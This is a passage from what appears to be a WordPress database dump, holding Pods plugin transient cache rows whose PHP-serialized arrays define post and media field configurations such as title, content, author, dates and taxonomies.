f8e67ab040aa70abba11ab0d2','1782398266','off'),(5635229,'_transient_pods_0bce058f8e67ab040aa70abba11ab0d2','a:0:{}','off'),(5635222,'_transient_timeout_pods_4ee5d7598d6757313b6a0d3d4c053e7d','1782398266','off'),(5635223,'_transient_pods_4ee5d7598d6757313b6a0d3d4c053e7d','a:0:{}','off'),(5635224,'_transient_timeout_pods_6313f3d9072c5c0d891a30287b47d85a','1782398266','off'),(5635225,'_transient_pods_6313f3d9072c5c0d891a30287b47d85a','a:0:{}','off'),(5639952,'_transient_timeout_pods_e10595c35e18b33a7f6264355b2fc2e4','1782545905','off'),(5639953,'_transient_pods_e10595c35e18b33a7f6264355b2fc2e4','a:0:{}','off'),(5639491,'_transient_timeout_pods_pods_form_admin_init_field_types-3282','1782528277','off'),(5639492,'_transient_pods_pods_form_admin_init_field_types-3282','a:22:{i:0;s:4:\"text\";i:1;s:7:\"website\";i:2;s:5:\"phone\";i:3;s:5:\"email\";i:4;s:8:\"password\";i:5;s:9:\"paragraph\";i:6;s:7:\"wysiwyg\";i:7;s:4:\"code\";i:8;s:8:\"datetime\";i:9;s:4:\"date\";i:10;s:4:\"time\";i:11;s:6:\"number\";i:12;s:8:\"currency\";i:13;s:4:\"file\";i:14;s:6:\"avatar\";i:15;s:6:\"oembed\";i:16;s:4:\"pick\";i:17;s:7:\"boolean\";i:18;s:5:\"color\";i:19;s:4:\"slug\";i:20;s:7:\"heading\";i:21;s:4:\"html\";}','off'),(5639987,'_transient_timeout_pods_8e66e94b8249d0bfb239346d2926880f','1782547247','off'),(5639988,'_transient_pods_8e66e94b8249d0bfb239346d2926880f','a:0:{}','off'),(5639989,'_transient_timeout_pods_c4e09be0df065b192e76b8af85664f32','1782547247','off'),(5639990,'_transient_pods_c4e09be0df065b192e76b8af85664f32','a:0:{}','off'),(5639991,'_transient_timeout_pods_c5832e4760dad3e63997b2b6353b4089','1782547247','off'),(5639992,'_transient_pods_c5832e4760dad3e63997b2b6353b4089','a:0:{}','off'),(5639993,'_transient_timeout_pods_a2e533a7b4bf60fa9049884b28680b07','1782547247','off'),(5639994,'_transient_pods_a2e533a7b4bf60fa9049884b28680b07','a:0:{}','off'),(5639950,'_transient_timeout_pods_a7c47c021a5be55caca1f928c2937030','1782545904','off'),(5639951,'_transient_pods_a7c47c021a5be55caca1f928c2937030','a:27:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:12:\"resource_tag\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"resource_tag\";s:5:\"label\";s:13:\"Resource Tags\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:12:\"resource_tag\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:12:\"resource_tag\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}s:13:\"resource_type\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"resource_type\";s:5:\"label\";s:14:\"Resource Types\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:13:\"resource_type\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:13:\"resource_type\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}}','off'),(5637340,'_transient_timeout_pods_336edd738e69d34ee72583f79e2e066f','1782456450','off'),(5637341,'_transient_pods_336edd738e69d34ee72583f79e2e066f','a:0:{}','off'),(5637342,'_transient_timeout_pods_81cf34e9ad4ad67b81df7b70473a030f','1782456450','off'),(5637343,'_transient_pods_81cf34e9ad4ad67b81df7b70473a030f','a:0:{}','off'),(5637344,'_transient_timeout_pods_522ef33eacea7ff4603cde678575bf2f','1782456450','off'),(5637345,'_transient_pods_522ef33eacea7ff4603cde678575bf2f','a:0:{}','off'),(5637346,'_transient_timeout_pods_48ddfee87d91e01a7cb260ab270905a2','1782456450','off'),(5637347,'_transient_pods_48ddfee87d91e01a7cb260ab270905a2','a:0:{}','off'),(5637348,'_transient_timeout_pods_bb42d00ed3725827ce8b2972d061fc97','1782456450','off'),(5637349,'_transient_pods_bb42d00ed3725827ce8b2972d061fc97','a:0:{}','off'),(5635221,'_transient_pods_c03da762a08ec72ee6f9c16b5b2dd70d','a:28:{s:11:\"object_type\";s:5:\"media\";s:4:\"type\";s:5:\"media\";s:11:\"object_name\";s:10:\"attachment\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:13:\"wp_pods_media\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:30:\"`t`.`post_type` = \'attachment\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:11:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:10:\"collection\";s:4:\"name\";s:5:\"media\";s:2:\"id\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:5:\"Media\";s:11:\"description\";s:0:\"\";s:4:\"type\";s:5:\"media\";s:7:\"storage\";s:4:\"meta\";s:5:\"adhoc\";b:1;}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:24:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\